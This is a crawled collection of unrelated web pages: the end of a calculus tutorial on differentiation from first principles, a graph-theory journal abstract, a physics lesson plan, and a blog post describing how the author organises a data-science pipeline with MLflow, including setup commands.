2 }\\quad +\\quad 2x(\\Delta x)$\n\nAs", null, "$\\Delta x$ is common we take it to the other side of the equation.\n\nStep 3:", null, "$\\frac { \\Delta y }{ \\Delta x } \\quad =\\quad \\Delta x\\quad +\\quad 2x$\n\nAs Q approaches P", null, "$\\Delta x$ becomes smaller and smaller and eventually becomes zero. 
At this instance, the gradient of PQ becomes the gradient of the tangent at P.\n\nStep 4:\n\nAs", null, "$Q\\quad \\rightarrow \\quad P$,  gradient of", null, "$QP\\quad =\\quad \\lim _{ \\Delta x\\rightarrow 0 }{ (\\frac { \\Delta y }{ \\Delta x } ) }$", null, "$=\\quad \\lim _{ \\Delta x\\rightarrow 0 }{ (\\Delta x\\quad +\\quad 2x) }$", null, "$=\\quad 0\\quad +\\quad 2x$", null, "$=\\quad 2x$", null, "$\\lim _{ \\Delta x\\rightarrow 0 }{ (\\frac { \\Delta y }{ \\Delta x } ) }$  is called the differential coefficient of y with respect to x OR derivative of y with respect to x and is symbolically written as", null, "$\\frac { dy }{ dx }$.\n\nThe above method of finding the differential coefficient of y with respect to x is known as “Differentiation from the First Principles”.\n\nIt involves four steps:\n\n Step 1 Give increments to both x & y i.e", null, "$\\Delta x,\\quad \\Delta y$ Step 2 Find change", null, "$\\Delta y$ of y Step 3 Find rate of change of y with respect to x i.e", null, "$\\frac { \\Delta y }{ \\Delta x } \\quad or\\quad \\frac { dy }{ dx }$ Step 4 Take the limit of", null, "$\\frac { \\Delta y }{ \\Delta x } \\quad as\\quad \\Delta x\\quad \\rightarrow \\quad 0$\n\n#### Example #1\n\nQ. Differentiate", null, "$\\frac { 2 }{ x }$ with respect to x from the First Principle.\n\nFirstly, let", null, "$y\\quad =\\quad \\frac { 2 }{ x } \\quad \\quad \\quad \\quad \\quad \\rightarrow \\quad equation\\quad 1$\n\nStep 1:\n\nGiving increments to x & y", null, "$y\\quad +\\quad \\Delta y\\quad =\\quad \\frac { 2 }{ x\\quad +\\quad \\Delta x }$\n\nStep 2:", null, "$\\Delta y\\quad =\\quad \\frac { 2 }{ x\\quad +\\quad \\Delta x } \\quad -\\quad y$\n\nSubstitute equation 1 in the above equation", null, "$\\Delta y\\quad =\\quad \\frac { 2 }{ x\\quad +\\quad \\Delta x } \\quad -\\quad \\frac { 2 }{ x }$", null, "$\\quad =\\quad \\frac { 2x\\quad -2x\\quad -2\\Delta x }{ x(x\\quad +\\quad \\Delta x) }$", null, "$\\quad =\\quad \\frac { -2\\Delta x }{ x(x\\quad +\\quad \\Delta x) }$\n\nStep 3:\n\nDivide both sides by", null, "$\\Delta x$", null, "$\\frac { \\Delta y }{ \\Delta x } \\quad =\\quad \\frac { -2\\Delta x }{ x(x\\quad +\\quad \\Delta x)\\Delta x }$", null, "$\\frac { \\Delta y }{ \\Delta x } \\quad =\\quad \\frac { -2 }{ x(x\\quad +\\quad \\Delta x) }$\n\nStep 4:\n\nWhen", null, "$\\Delta x\\quad \\rightarrow \\quad 0$", null, "$\\lim _{ \\Delta x\\rightarrow 0 }{ \\frac { \\Delta y }{ \\Delta x } } \\quad =\\quad \\lim _{ \\Delta x\\rightarrow 0 }{ (\\frac { -2 }{ x(x\\quad +\\quad \\Delta x) } ) }$", null, "$=\\quad (\\frac { -2 }{ x(x\\quad +\\quad 0) } )$\n\nAns:", null, "$\\frac { \\Delta y }{ \\Delta x } \\quad =\\quad \\frac { -2 }{ { x }^{ 2 } }$", null, "", null, "", null, "", null, "", null, "" ]
[ null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://i0.wp.com/alevelmaths.co.uk/wp-content/uploads/2018/12/1-6.png", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.923683,"math_prob":1.0000048,"size":2340,"snap":"2023-40-2023-50","text_gpt3_token_len":568,"char_repetition_ratio":0.16481164,"word_repetition_ratio":0.085339166,"special_character_ratio":0.23760684,"punctuation_ratio":0.10139165,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.0000098,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,2,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-10T13:25:45Z\",\"WARC-Record-ID\":\"<urn:uuid:1de987cc-1e33-4340-be5e-c7576c62cb2b>\",\"Content-Length\":\"66849\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:470d4c03-7a79-4275-95a8-8548e5e10ee0>\",\"WARC-Concurrent-To\":\"<urn:uuid:0c3357f0-ebd5-4fc3-97ef-b7cf864c446e>\",\"WARC-IP-Address\":\"209.97.178.131\",\"WARC-Target-URI\":\"https://alevelmaths.co.uk/pure-maths/calculus/differentiation-from-first-principle/\",\"WARC-Payload-Digest\":\"sha1:7ASJDREMYIAPSR5RXGDFA5TKHF3IQSAU\",\"WARC-Block-Digest\":\"sha1:3CGLJJERXYLD6G2FCBZZRYYFJYSPOVR3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679102469.83_warc_CC-MAIN-20231210123756-20231210153756-00398.warc.gz\"}"}
https://dmtcs.episciences.org/3149
[ "## van Aardt, Susan, and Burger, Alewyn Petrus and Frick, Marietjie - The Existence of Planar Hypotraceable Oriented Graphs\n\ndmtcs:1310 - Discrete Mathematics & Theoretical Computer Science, March 16, 2017, Vol. 19 no. 1 - https://doi.org/10.23638/DMTCS-19-1-4\nThe Existence of Planar Hypotraceable Oriented Graphs\n\nAuthors: van Aardt, Susan, and Burger, Alewyn Petrus and Frick, Marietjie\n\nA digraph is \\emph{traceable} if it has a path that visits every vertex. A digraph $D$ is \\emph{hypotraceable} if $D$ is not traceable but $D-v$ is traceable for every vertex $v\\in V(D)$. It is known that there exists a planar hypotraceable digraph of order $n$ for every $n\\geq 7$, but no examples of planar hypotraceable oriented graphs (digraphs without 2-cycles) have yet appeared in the literature. We show that there exists a planar hypotraceable oriented graph of order $n$ for every even $n \\geq 10$, with the possible exception of $n = 14$.\n\nVolume: Vol. 19 no. 1\nSection: Graph Theory\nPublished on: March 16, 2017\nSubmitted on: February 17, 2017\nKeywords: planar,hypohamiltonian,Hypotraceable,oriented graph,MSC 05C10, 05C20, 05C38,[MATH] Mathematics [math],[INFO.INFO-DM] Computer Science [cs]/Discrete Mathematics [cs.DM]" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.93412757,"math_prob":0.79480773,"size":549,"snap":"2020-45-2020-50","text_gpt3_token_len":164,"char_repetition_ratio":0.16880734,"word_repetition_ratio":0.06741573,"special_character_ratio":0.2513661,"punctuation_ratio":0.057142857,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9739124,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-21T04:08:39Z\",\"WARC-Record-ID\":\"<urn:uuid:fd76362d-7e62-4add-ad29-6243c7dd2824>\",\"Content-Length\":\"33939\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c1b4368f-33c3-4f0b-84ea-151753048955>\",\"WARC-Concurrent-To\":\"<urn:uuid:8a037e11-f9fe-461a-94a2-5295c658cb2d>\",\"WARC-IP-Address\":\"193.48.96.94\",\"WARC-Target-URI\":\"https://dmtcs.episciences.org/3149\",\"WARC-Payload-Digest\":\"sha1:5VBW6UDWB6VKJEGTYMJ7YJHZUQO7HK5L\",\"WARC-Block-Digest\":\"sha1:C33K2PR7NVS5J2OFVUEZTMD2IWNMNYPJ\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107875980.5_warc_CC-MAIN-20201021035155-20201021065155-00386.warc.gz\"}"}
https://www.nagwa.com/en/plans/290125715391/
[ "# Lesson Plan: Resultant Motion and Force Physics\n\nThis lesson plan includes the objectives, prerequisites, and exclusions of the lesson teaching students how to show that motion in directions that are at right angles to each other can be represented by motion in one direction.\n\n#### Objectives\n\nStudents will be able to\n\n• calculate perpendicular components of a vector representing a displacement, velocity, acceleration, or force,\n• calculate the resultant of multiple vectors representing displacements, velocities, accelerations, or forces.\n\n#### Prerequisites\n\nStudents should already be familiar with\n\n• the sine, cosine, and tangent of an angle in a right triangle,\n• the Pythagorean theorem,\n• kinematic SUVAT equations.\n\n#### Exclusions\n\nStudents will not cover\n\n• 3D vectors." ]
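A small illustrative sketch (not part of the lesson plan itself) of the two objectives listed above: resolving a vector into perpendicular components with sine and cosine, and recombining perpendicular components into a resultant with the Pythagorean theorem. The helper names are mine.

```python
import math

def components(magnitude: float, angle_deg: float) -> tuple:
    """Perpendicular (x, y) components of a vector at angle_deg above the x-axis."""
    angle = math.radians(angle_deg)
    return magnitude * math.cos(angle), magnitude * math.sin(angle)

def resultant(x: float, y: float) -> tuple:
    """Magnitude and direction (degrees) of the resultant of two perpendicular components."""
    return math.hypot(x, y), math.degrees(math.atan2(y, x))

print(components(10.0, 30.0))  # approximately (8.66, 5.00)
print(resultant(3.0, 4.0))     # (5.0, 53.13...) via the Pythagorean theorem and arctangent
```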
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.83689356,"math_prob":0.9387649,"size":760,"snap":"2023-14-2023-23","text_gpt3_token_len":151,"char_repetition_ratio":0.10449736,"word_repetition_ratio":0.0,"special_character_ratio":0.18026316,"punctuation_ratio":0.144,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.994159,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-02T22:19:43Z\",\"WARC-Record-ID\":\"<urn:uuid:64d10262-c548-4b7d-9aee-22b53aa48d83>\",\"Content-Length\":\"29717\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d19b3912-ad17-4098-8a04-91106fb59f88>\",\"WARC-Concurrent-To\":\"<urn:uuid:e49d20be-6e12-4375-92fc-67cd86f7f070>\",\"WARC-IP-Address\":\"172.67.69.52\",\"WARC-Target-URI\":\"https://www.nagwa.com/en/plans/290125715391/\",\"WARC-Payload-Digest\":\"sha1:26XIFZRFXW5FJSO6F57KQLLJ3RPRAMZJ\",\"WARC-Block-Digest\":\"sha1:J663P6CX2FFG2J5LMGHW4DNI26M6VFLW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224648858.14_warc_CC-MAIN-20230602204755-20230602234755-00334.warc.gz\"}"}
https://stdiff.net/MB2019021201.html
[ "My first try at MLflow\n\ntl;dr MLflow is cool but still requires some work to use it.\n\nImagine that several data scientists work on a data science project. They have to train a good predictive model. They have lots of ideas. Thus they process the raw data in various ways, sometimes add an additional data source to the original data, select features to remove non-significant ones, and try to train various models, maybe including a multi-layer neural network. They do lots of experiments in order to improve their model.\n\nIn the end they have to deliver the best model: the feature matrix can be constructed by converting the data with a certain method, and we train a neural network with 4 layers. But where is the source code? Because they work in Jupyter Notebook, there is an exported HTML but no executable script? Ok, I found it... But wait, the result is different from the previous result in the exported HTML file. Why?\n\nData science is science. We do lots of experiments to obtain a good predictive model. But if we do not manage trained models carefully, we will face a problem of reproducibility.\n\nSo how can we manage the trained models? Take a note about each model? Git commit with the result? Well, in fact there are several applications and web services for that purpose. For example FLOYDHUB and comet. They look good, but they are quite expensive for a small team.\n\nTherefore I tried MLflow as a substitute for them.", null, "MLflow is an open source project which is developed mainly by Databricks. The application already supports many machine learning libraries/frameworks: scikit-learn, PyTorch, TensorFlow, Apache Spark. You can also use the application from R. According to the documentation, we do not need to learn many new things. Why don't we try it?\n\n## A (too) short overview of MLflow\n\nIt is definitely better to watch an official presentation for MLflow.\n\nRoughly speaking, MLflow consists of three components:\n\n• Tracking: logger of training\n• Projects: definition of the environment (conda env + how to execute)\n• Models: web API of the trained model\n\nMLflow Tracking logs a commit hash so that you can find the source code which produces a specified result.\n\nMLflow Projects is just a specification of an ML pipeline. A text file MLproject describes which development environment is used and how a script must be executed. Maybe you can easily understand it if you see an example.\n\nMLflow Models provides an easy way to expose a trained model as a web API.\n\nSo in the best scenario you can train as many models as you like, after that you can choose the best model from MLflow Tracking, and thanks to MLflow Projects you can reproduce the result. Moreover it is easy to integrate the trained model into a production system as part of microservices.\n\nYes, it sounds really cool.\n\n## Here is a data science project\n\nWARNING\n\n• My usage of MLflow is probably different from what the MLflow developers expect.\n• The version of MLflow is 0.8.1. Not the newest.\n\nYou have a large database. Every hour, every minute, every second you receive many records such as user behaviour on a web site. You want to create a better model which provides a better result for a business problem. So you want to deliver a new and better model regularly. The new model should be provided as a REST API, so that it is easy to apply the trained model from another server. 
Since the data is quite large and the project is very important for the business, several data scientists work on the project.\n\nCan you picture the project?\n\nThen let us consider what we have to do.", null, "As you can see, there are three steps.\n\n1. Loading: Fetch the raw data from the database.\n2. Processing: Convert the collected data into a single feature matrix.\n3. Training: Train a mathematical model with a machine learning algorithm.\n\nEach step can be done by a different data scientist. (I do not mean that a data scientist is responsible for only one of the steps.) So each script belongs to one of the steps. Thus in order to execute the whole pipeline we have to execute the three scripts in the right order after activating the environment we need.\n\n$ conda activate yourenv\n$ python load-data.py       ## Loading\n$ python fs_stats_test.py   ## Processing\n$ python randomforest.py    ## Training\n\nMLflow Projects enables us to package the whole procedure. If you write an MLproject file, then the following command gets the job done.\n\n$ mlflow run .\n\nSince the last script stores the trained model, we can easily serve the trained model through a web API:\n\n$ mlflow pyfunc serve -p 1234 -m ....\n\nIt's easy, isn't it?\n\n## Challenges\n\nWell, in fact, it is not so easy. We have to take care of lots of things. In other words, you need to prepare several helper functions/classes to integrate the project into MLflow.\n\nThe challenges I am going to describe also apply to other, similar machine learning project frameworks.\n\n### 1. Coherent chain of steps\n\nMLflow Tracking logs the commit hash automatically when you submit the results (parameters and metrics). So you can obtain the script which produces the needed result.\n\nYeah, you might forget to commit the modification before starting a run. (I will explain later what a run is.) This might be a typical mistake, but we ignore this: everybody commits before starting a run.\n\nBut the problem is: a different script is based on a different commit.", null, "Imagine that a data scientist writes a script for data processing and starts several runs. The first run fills missing values with the mean value. The second run fills the missing values with a random forest model. The third run adds an additional column which can be useful for us. The fourth run selects several columns by using a statistical test.\n\nYou can convert the data into a feature matrix in several ways, and this is one of the important steps in training a good model. And the best feature matrix depends on the model and the data. Last week the best model was a logistic regression with a feature matrix whose missing values were filled by a random forest. Because you got a lot of new data, the best model of this week can be an XGB model with a feature matrix whose missing values are filled with the mean value. This can really happen.\n\nIt is best that several feature matrices are available at any time. But every branch has only one direction, not several. Thus we have to manage several data processing variants somehow.\n\n### 2. Data-versioning\n\nA data scientist fetches data, say D1, and trains a model, say M1. Next week a different data scientist fetches data, say D2, and trains a different model, say M2. Then it is nonsense to compare the CV scores of M1 and M2.\n\n(If we train the same model on D1 and D2, then we get something similar to a learning curve, but that is not the case here.)\n\nData also has a version. In one ML life cycle the data version should not change. 
But it can change between two cycles.\n\nThe problem is: the version of the script does not correspond to the version of the data. The same script can fetch a different data set. Namely, a commit hash does not help us. We have to manage the versions of the data in a suitable way.\n\n### 3. Input data to the API\n\nUsing MLflow Models we can easily store the trained model.\n\nmlflow.sklearn.log_model(model, \"model\")\n\nAnd we can provide the web API of the trained model very easily. But the input data must match the feature variables. In other words, you have to apply the data processing in advance.\n\nIf you want to use MLflow Models in a production system, you cannot assume that the input data has already been processed as you expect. As we said above, the data processing can also change. Therefore you have to integrate your data processing between the raw data and the web API of MLflow.\n\n## Possible solutions\n\nIn my opinion one of the easy possible solutions to challenges 1 and 2 is to use parameters.", null, "Before going into details, we would like to explain some important features and concepts of MLflow Tracking very briefly.\n\nA run is a unit of what you want to log. A typical example is the training of a model.\n\nwith mlflow.start_run():\n    ### this and that ..\n    mlflow.log_param(\"algorithm\", \"LogisticRegression\")\n    mlflow.log_param(\"C\", 10)\n    mlflow.log_metric(\"training score\", 0.890)\n    mlflow.log_metric(\"test score\", 0.789)\n\nThen parameters and metrics are logged as the result of the run. The commit hash of the script is also logged. (Thus you can find the source code which you executed.) We should note that an option of the script is regarded as a parameter. Namely\n\n$ python main.py --table transactions\n\nis the same as\n\nmlflow.log_param(\"table\", \"transactions\")\n\nThis is technical, but we need to keep it in mind when we design a process with MLflow.\n\n### Data-Versioning\n\nFirst we consider the data-versioning. You should give two parameters:\n\n• Type of data: the name of a table or a query\n• Retrieval time: when you retrieved the data\n\nThe pair of the two is an ID of the data or a run. That's it.\n\nYour query is something like select * from t where year = '2018', and therefore you think you should use year as a parameter instead of the retrieval time? No, you should use it as an additional parameter, but it is better to have the retrieval time. That is because the query can change. What if the query select * from t where year = '2018' becomes select t.*, s.col1 from t left join s on t.id = s.id where t.year = '2018'; because you need more data? Both queries return data for 2018.\n\n### Coherent chain of steps\n\nActually we can tackle the first challenge in the same way. That is, we use a pair of \"type\" and execution time (run_time) as an ID of each step.\n\n| step | type | run_time |\n| --- | --- | --- |\n| loading | table | loaded_time |\n| processing | logic | processed_time |\n| training | algorithm | trained_time |\n\nSay you write a script for data processing. Then your logic (how to fill missing values, how to create a new variable, etc.) is of course based on the data. Therefore a run of your data processing must have the ID of the run for the data loading, and you also give the pair of logic (a short name for the data processing) and processing_time.
Therefore a run for data processing contains (at least) the following:\n\n• table (the type of the load run)\n• retrieval_time (the run time of the load run)\n• logic (the type of the processing run)\n• processing_time (the run time of the processing run)\n\nThe first two parameters specify the run for the data load, and the pair of the third and fourth parameters is the ID of the processing run.", null, "We can apply the same idea to a run in \"training\". That is, we give the ID of the training run (algorithm and trained_time) and the ID of the processing run which the training run is based on. (Of course you should give more parameters, such as the values of hyperparameters.)", null, "### Input data to the API\n\nThis is a relatively technical problem. At first I naïvely thought that it is OK to use mlflow.pyfunc, but I still do not understand how we can make use of this module for our purpose. So I use a trick.\n\nThe basic idea is easy to understand. If we can store an instance of the following class, then you can use it as a \"model\".\n\nclass MyModell:\n    def __init__(self, processor, model):\n        self.processor = processor\n        self.model = model\n\n    def predict(self, X, y=None):\n        X_processed = self.processor(X)\n        return self.model.predict(X_processed)\n\nI wrote a complete version of the class. You can store an instance of the class with mlflow.sklearn.log_model. processor is a function which converts the raw data into a feature matrix. It typically has an internal state such as a fitted LabelBinarizer. You store the function as an artifact of the processing run.\n\nThere are two problems: 1) If you save a function with pickle, then you might not be able to deserialise the pickled function. In such a case you need to use dill instead of pickle. 2) The MyModell class must be installed in the conda environment. Otherwise you cannot deserialise the logged model. This is the reason why I wrote a simple class and put it on GitHub. You can install the module with the command\n\n$ pip install https://github.com/stdiff/model_enhanced/archive/v0.2.zip\n\nIn conda.yaml you can simply put\n\n- https://github.com/stdiff/model_enhanced/archive/v0.2.zip\n\n## Implementation of an ML project\n\nMLflow is a flexible framework. This is important because the process of a data science project normally depends largely on the project itself.\n\nBut in my opinion lots of functions are still lacking, especially ones which deal with runs in an easy way. Therefore I have developed a sample project: mlflow-app.\n\nWarning:\n\n• The convention is slightly different from this blog entry. This is because I changed lots of concepts during development.\n• My implementation is incomplete. There are no unit tests, several values are hard-coded, and it cannot easily be extended to a general project process.\n• That is, this application is just a PoC, not of production quality.\n\nI assume that Anaconda is installed. You can clone the source code from my repository with the following command\n\ngit clone git@github.com:stdiff/mlflow-app.git\n\nThen you have to download the data set: Credit Card Fraud Detection. Put the zip file under the data directory. We are going to build a predictive model for anomaly detection.\n\nNext you need to create a conda environment and activate it:\n\n$ conda env create -n pipeline --file conda.yaml\n$ conda activate pipeline\n\nNow MLflow is available in the environment. Start the MLflow UI on port 5009.\n\n(pipeline) $ mlflow ui --port 5009 &\n\nThere is no specific reason for 5009, but if you want to change the port number then you have to change \"config.ini\" accordingly. 
Then we create three experiments. Here an experiment is a set of runs. When you start a run, you can specify the experiment which the run should belong to.\n\n(pipeline) $ MLFLOW_TRACKING_URI=http://localhost:5009 mlflow experiments create load\nCreated experiment 'load' with id 1\n\n(pipeline) $ MLFLOW_TRACKING_URI=http://localhost:5009 mlflow experiments create processing\nCreated experiment 'processing' with id 2\n\n(pipeline) $ MLFLOW_TRACKING_URI=http://localhost:5009 mlflow experiments create model\nCreated experiment 'model' with id 3\n\nThe id numbers are important, because we use them when starting a run.\n\n(pipeline) $ mlflow run --no-conda -e load --experiment-id 1 . -P table=transactions\n\nThis command executes load/load_data.py, which splits the whole data into a training set and a test set. The result (the training set and the test set) of this run is logged as \"artifacts\" in experiment \"load\". After the execution you can check the result from the web UI.\n\nThe following command starts a run for data processing. It converts the training set and the test set in a certain way and stores the function for the data processing as an artifact. Change the retrieval_time before executing it.\n\n(pipeline) $ mlflow run --no-conda -e processing --experiment-id 2 . -P table=transactions -P retrieval_time=2019-02-09\n\nThe last step is a hyperparameter tuning with GridSearchCV. The model is the (penalised) logistic regression. Do not forget to change processed_time.\n\n(pipeline) $ mlflow run --no-conda -e model --experiment-id 3 . -P logic=plain -P processed_time=2019-02-09\n\nThis process takes very long (around 1 hour), so if you want to avoid such heavy training for the PoC, add the following line at line 152:\n\ndf = df.head(10000)\n\nThe trained model is saved as a \"model\" and you can easily start the web API of the model. From the web UI you need to check the path to the model, then execute the following command with the path to the model\n\n(pipeline) $ mlflow pyfunc serve -p 1234 --no-conda -m /xxxxxxx/artifacts/model\n\nThen http://127.0.0.1:1234/invocations will be the endpoint of the API.\n\nFinally, the coherent path of steps is checked by main.py.\n\n(pipeline) $ mlflow run --no-conda -e main . -P retrieval_time=2019-02-09 -P table=transactions -P logic=plain -P algorithm=LogisticRegression\n\nThis command starts the given run for data loading (table, retrieval_time) and then looks for the newest coherent path within the given types (logic, algorithm). If there is no coherent path, then a run is started. The coherent path can be found in experiment \"Default\".", null, "In this case the run for training with (LogisticRegression, 1549793781) is the last step and stores the trained model you need.\n\n### Implementation is not so easy\n\nA large part of the source code is for MLflow, while the analysis itself is easy. You can find the corresponding analysis in this notebook. If you would just like to log the result of the training, then it is easy to use MLflow (Tracking). But if you want to integrate MLflow into the project process which we discussed above, then you need to write several helper functions and a small class. This is because MLflow does not provide functions to search for a run. I needed to write functions for that purpose.\n\n### FAQ for my implementation\n\n#### Why don't we use the run id?\n\nDo you want to deal with a string like \"20128fa478b4458e945260a124b72c4f\"? If yes, use it. But if you do so, then you cannot make use of the \"type\" of a run. 
That is, \"searching for the newest data processing with a certain logic\" becomes nonsense.\n\n#### Why do we use unix time?\n\nFor the main entry point we give processed_time and trained_time as metrics. MLflow requires that a metric is a number, therefore we cannot use an ordinary time description. If you want to use a more user-friendly description, there are (at least) two solutions.\n\n1. Use the \"yyyymmddHHMMSS\" format (in UTC), then you can use the description as a parameter (str) and a metric (int) at the same time.\n2. Stick with parameters. (Do not give a time description in a \"metric\".)\n\n#### Why don't we use the start time?\n\nThe reason is the same as above.\n\n#### But we use a date when starting a run.\n\nIf a date is given, then we look for the newest run within the given date.\n\n#### Why do we do \"train-test-splitting\" in data loading?\n\nYou don't need to do it in data loading. The PoC is just an example.\n\n#### What if there are two data sources?\n\nImagine there are two tables you need. Then the easiest solution would be to fetch the two tables in one run and store them as artifacts. Another solution would be to implement logic so that we can specify two runs for data loading. (E.g. table=transactions,customers.)\n\n#### Why don't we extend the \"multistep_workflow\" example?\n\nYou can find the example \"multistep_workflow\" in the MLflow repository. There are two points I don't like.\n\n• All the steps belong to one experiment. This makes it difficult to compare runs in the same step.\n• The dependency chain is not clear.\n\n#### Why don't we make use of conda at run time?\n\nIf several data scientists work on a project, then the development environment should be unified. That is, there should be a conda.yaml which is managed by the project team. Then why don't we use it?\n\n### Further Development\n\nThe implementation on GitHub is just a minimal PoC. Actually I have not implemented several things. I list them below.\n\n#### Modularisation of a type\n\nThe type should be specified by a parameter. That is, if we execute the following command\n\n$ mlflow run -e model . -P algorithm=rf [...]\n\nthen the code for a random forest model should be executed, and if we execute\n\n$ mlflow run -e model . -P algorithm=xgboost [...]\n\nthen the code for an XGBoost model should be executed. Namely, the script for the entry point of training is unique and the algorithm should be chosen by a parameter. We need to write something like the following:\n\nif algorithm == \"rf\":\n    result = rf(data, parameters)\nelif algorithm == \"xgboost\":\n    result = xgboost(data, parameters)\n\nThe functions such as rf or xgboost are defined in a separate script.\n\nI wrote several functions and pieces of code for searching for a specified run. The interface should be more unified, and we should be able to use it without knowing the details of the classes of MLflow.\n\nOf course.\n\n## Problems\n\nI find MLflow very cool, but it is still a beta release. There are several things to do before the official release.\n\n### Documentation\n\nI have not understood the relations among the classes of MLflow yet. For example, lots of classes related to a run belong to mlflow.entities. Here is a question: How can we get all key-value pairs of parameters of a run with a given run id?\n\n1. Get the experiment id with an MLflow client instance.\n2. Get the list of RunInfo instances with client.list_run_infos(experiment_id).\n3. Each RunInfo instance has a data property with the value in RunData.\n4. The RunData instance has an attribute param which is a list of Param instances.\n5. Each Param instance has key and value properties. 
All pairs of these properties are what we want.\n\nWell, it is very difficult to find/understand these relations from the documentation.\n\n(To be honest I don't like Java-style OOP like this. For example, an Experiment instance has no information about the runs which belong to the experiment. The Experiment class is used only to keep a very small piece of information.)\n\nI strongly recommend writing docstrings in detail.\n\nclass Run(_MLflowObject):\n    \"\"\"\n    Run object.\n    \"\"\"\n\nThis docstring is not helpful at all.\n\n### Deletion of the directory of a run\n\nIf a run is removed, then the related files should also be removed. It is very difficult to remove the directories of removed runs manually, because the directory name of a run is the run id.\n\n### Experiment name instead of id\n\nAn experiment name should be accepted when executing an mlflow run command.\n\n### Don't ignore the set_experiment method\n\nIf we start a run with the \"mlflow run\" command, then the setter\n\nmlflow.set_experiment(\"your_special_experiment\")\n\nis ignored. I don't think that is good behaviour.\n\n## Summary\n\n• MLflow is a useful application/framework to manage a data science project.\n• For simple usage MLflow works out of the box.\n• If you need non-simple usage, then you have to implement several functions/classes.\n\nCategories: #data-mining" ]
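A minimal sketch of the five lookup steps listed above, written against the MLflow 0.8.x tracking API as it is described in this post. The function name is mine, and the attribute names (RunInfo.data, the list of Param objects, exposed as param or params depending on the version) are taken from the description rather than checked against a current MLflow release, so treat them as assumptions.

```python
from mlflow.tracking import MlflowClient

def params_of_run(experiment_id, run_uuid):
    """Return all key-value parameter pairs of the run with the given id."""
    client = MlflowClient()                                   # 1. tracking client instance
    for run_info in client.list_run_infos(experiment_id):     # 2. list of RunInfo instances
        if run_info.run_uuid == run_uuid:
            run_data = run_info.data                          # 3. RunData of this run
            return {p.key: p.value for p in run_data.params}  # 4./5. Param key/value pairs
    return {}
```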
